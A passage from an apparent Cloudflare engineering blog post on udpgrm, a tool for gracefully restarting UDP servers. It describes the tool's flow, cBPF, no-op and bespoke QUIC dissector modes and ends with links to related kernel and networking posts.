DISSECTOR_FLOW: udpgrm maintains a flow table indexed by a flow hash computed from a typical 4-tuple. It stores a target socket identifier for each flow. The flow table size is fixed, so there is a limit to the number of concurrent flows supported by this mode. To mark a flow as “assured,” udpgrm hooks into the sendmsg
syscall and saves the flow in the table only when a message is sent.
DISSECTOR_CBPF: A cookie-based model where the target socket identifier — called a udpgrm cookie — is encoded in each incoming UDP packet. For example, in QUIC, this identifier can be stored as part of the connection ID. The dissection logic is expressed as cBPF code. This model does not require a flow table in udpgrm but is harder to integrate because it needs protocol and server support.
DISSECTOR_NOOP: A no-op mode with no state tracking at all. It is useful for traditional UDP services like DNS, where we want to avoid losing even a single packet during an upgrade.
Finally, udpgrm provides a template for a more advanced dissector called DISSECTOR_BESPOKE. Currently, it includes a QUIC dissector that can decode the QUIC TLS SNI and direct specific TLS hostnames to specific socket generations.
For more details, please consult the udpgrm README. In short: the FLOW dissector is the simplest one, useful for old protocols. CBPF dissector is good for experimentation when the protocol allows storing a custom connection id (cookie) — we used it to develop our own QUIC Connection ID schema (also named DCID) — but it’s slow, because it interprets cBPF inside eBPF (yes really!). NOOP is useful, but only for very specific niche servers. The real magic is in the BESPOKE type, where users can create arbitrary, fast, and powerful dissector logic.
The adoption of QUIC and other UDP-based protocols means that gracefully restarting UDP servers is becoming an increasingly important problem. To our knowledge, a reusable, configurable and easy to use solution didn’t exist yet. The udpgrm project brings together several novel ideas: a clean API using setsockopt()
, careful socket-stealing logic hidden under the hood, powerful and expressive configurable dissectors, and well-thought-out integration with systemd.
While udpgrm is intended to be easy to use, it hides a lot of complexity and solves a genuinely hard problem. The core issue is that the Linux Sockets API has not kept up with the modern needs of UDP.
Ideally, most of this should really be a feature of systemd. That includes supporting the “at least one” server instance mode, UDP SO_REUSEPORT
socket creation, installing a REUSEPORT_EBPF
program, and managing the “working generation” pointer. We hope that udpgrm helps create the space and vocabulary for these long-term improvements.
Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.
To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.
April 02, 2025 1:00 PM
A steam locomotive from 1993 broke my yarn test
Yarn tests fail consistently at the 27-second mark. The usual suspects are swiftly eliminated. A deep dive is taken to comb through traces, only to be derailed into an unexpected crash investigation.…
February 14, 2025 2:00 PM
Searching for the cause of hung tasks in the Linux kernel
The Linux kernel can produce a hung task warning. Searching the Internet and the kernel docs, you can find a brief explanation that the process is stuck in the uninterruptible state.…
January 03, 2025 2:00 PM
Multi-Path TCP: revolutionizing connectivity, one path at a time
Multi-Path TCP (MPTCP) leverages multiple network interfaces, like Wi-Fi and cellular, to provide seamless mobility for more reliable connectivity. While promising, MPTCP is still in its early stages,…
March 06, 2024 2:00 PM
Linux kernel security tunables everyone should consider adopting
This post illustrates some of the Linux Kernel features, which are helping us to keep our production systems more secure. We will deep dive into how they work and why you may consider enabling them as well…